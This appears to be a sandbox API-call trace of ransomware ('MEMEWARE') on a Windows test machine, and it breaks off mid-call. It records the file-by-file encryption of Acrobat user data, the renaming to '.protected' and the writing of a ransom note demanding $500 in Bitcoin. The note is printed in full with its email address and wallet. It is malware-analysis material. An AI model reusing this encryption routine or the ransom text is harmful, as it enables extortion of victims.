lstrcmpiW (lpString1="glob.settings.js", lpString2="Program Files") returned -1 [0089.487] lstrcmpiW (lpString1="glob.settings.js", lpString2="Program Files (x86)") returned -1 [0089.487] lstrcmpiW (lpString1="glob.settings.js", lpString2="$Recycle.bin") returned 1 [0089.487] lstrcmpiW (lpString1="glob.settings.js", lpString2="System Volume Information") returned -1 [0089.487] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js") returned 97 [0089.487] StrStrIW (lpFirst="glob.settings.js", lpSrch=".protected") returned 0x0 [0089.487] lstrcmpW (lpString1="glob.settings.js", lpString2="RESTORE_FILES.txt") returned -1 [0089.487] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.487] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js") returned 97 [0089.488] StrStrW (lpFirst="glob.settings.js", lpSrch=".txt") returned 0x0 [0089.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js") returned 97 [0089.488] StrStrW (lpFirst="glob.settings.js", lpSrch=".rar") returned 0x0 [0089.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js") returned 97 [0089.488] StrStrW (lpFirst="glob.settings.js", lpSrch=".zip") returned 0x0 [0089.488] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xa, lpOverlapped=0x0) returned 1 [0089.489] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffff6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.489] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xa, lpOverlapped=0x0) returned 1 [0089.489] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.489] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.489] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.489] CloseHandle (hObject=0x154) returned 1 [0089.490] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.protected") returned 107 [0089.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.protected")) returned 1 [0089.490] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.490] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.491] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\RESTORE_FILES.txt") returned 98 [0089.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.501] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.501] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.502] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.502] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.502] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.502] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.502] CloseHandle (hObject=0x150) returned 1 [0089.502] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.502] lstrcmpiW (lpString1="Security", lpString2="Windows") returned -1 [0089.502] lstrcmpiW (lpString1="Security", lpString2="Program Files") returned 1 [0089.502] lstrcmpiW (lpString1="Security", lpString2="Program Files (x86)") returned 1 [0089.502] lstrcmpiW (lpString1="Security", lpString2="$Recycle.bin") returned 1 [0089.502] lstrcmpiW (lpString1="Security", lpString2="System Volume Information") returned -1 [0089.502] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned 77 [0089.502] lstrcmpW (lpString1="Security", lpString2=".") returned 1 [0089.502] lstrcmpW (lpString1="Security", lpString2="..") returned 1 [0089.502] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*") returned 79 [0089.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.503] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.503] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.503] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.503] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.503] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.503] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\.") returned 79 [0089.503] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.503] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.503] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.503] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.503] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.503] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.503] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.503] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\..") returned 80 [0089.503] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.503] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.503] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.503] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="Windows") returned -1 [0089.503] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="Program Files") returned -1 [0089.503] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="Program Files (x86)") returned -1 [0089.503] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="$Recycle.bin") returned 1 [0089.503] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="System Volume Information") returned -1 [0089.503] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata") returned 98 [0089.503] StrStrIW (lpFirst="addressbook.acrodata", lpSrch=".protected") returned 0x0 [0089.503] lstrcmpW (lpString1="addressbook.acrodata", lpString2="RESTORE_FILES.txt") returned -1 [0089.503] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.503] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata") returned 98 [0089.505] StrStrW (lpFirst="addressbook.acrodata", lpSrch=".txt") returned 0x0 [0089.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata") returned 98 [0089.505] StrStrW (lpFirst="addressbook.acrodata", lpSrch=".rar") returned 0x0 [0089.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata") returned 98 [0089.505] StrStrW (lpFirst="addressbook.acrodata", lpSrch=".zip") returned 0x0 [0089.505] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x1517, lpOverlapped=0x0) returned 1 [0089.525] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffeae9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.525] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x1517, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x1517, lpOverlapped=0x0) returned 1 [0089.525] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.525] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.525] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.525] CloseHandle (hObject=0x154) returned 1 [0089.526] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.protected") returned 108 [0089.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata.protected")) returned 1 [0089.526] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.526] lstrcmpiW (lpString1="CRLCache", lpString2="Windows") returned -1 [0089.526] lstrcmpiW (lpString1="CRLCache", lpString2="Program Files") returned -1 [0089.526] lstrcmpiW (lpString1="CRLCache", lpString2="Program Files (x86)") returned -1 [0089.527] lstrcmpiW (lpString1="CRLCache", lpString2="$Recycle.bin") returned 1 [0089.527] lstrcmpiW (lpString1="CRLCache", lpString2="System Volume Information") returned -1 [0089.527] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned 86 [0089.527] lstrcmpW (lpString1="CRLCache", lpString2=".") returned 1 [0089.527] lstrcmpW (lpString1="CRLCache", lpString2="..") returned 1 [0089.527] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*") returned 88 [0089.527] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0089.527] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.527] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.527] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.527] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.527] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.527] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\.") returned 88 [0089.527] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.527] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0089.527] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.527] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.527] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.527] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.527] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.527] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\..") returned 89 [0089.527] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.527] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.527] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0089.527] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="Windows") returned -1 [0089.527] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="Program Files") returned -1 [0089.527] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="Program Files (x86)") returned -1 [0089.527] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="$Recycle.bin") returned 1 [0089.527] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="System Volume Information") returned -1 [0089.527] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned 131 [0089.527] StrStrIW (lpFirst="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpSrch=".protected") returned 0x0 [0089.527] lstrcmpW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="RESTORE_FILES.txt") returned -1 [0089.527] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0089.527] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0089.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0089.528] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned 131 [0089.528] StrStrW (lpFirst="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpSrch=".txt") returned 0x0 [0089.528] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned 131 [0089.528] StrStrW (lpFirst="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpSrch=".rar") returned 0x0 [0089.528] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned 131 [0089.528] StrStrW (lpFirst="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpSrch=".zip") returned 0x0 [0089.528] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x3a5, lpOverlapped=0x0) returned 1 [0089.554] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc5b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.554] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x3a5, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x3a5, lpOverlapped=0x0) returned 1 [0089.555] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.555] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0089.556] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0089.556] CloseHandle (hObject=0x158) returned 1 [0089.556] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.protected") returned 141 [0089.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl.protected")) returned 1 [0089.557] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0089.557] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="Windows") returned -1 [0089.557] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="Program Files") returned -1 [0089.557] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="Program Files (x86)") returned -1 [0089.557] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="$Recycle.bin") returned 1 [0089.557] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="System Volume Information") returned -1 [0089.557] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned 131 [0089.557] StrStrIW (lpFirst="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpSrch=".protected") returned 0x0 [0089.557] lstrcmpW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="RESTORE_FILES.txt") returned -1 [0089.557] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0089.557] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 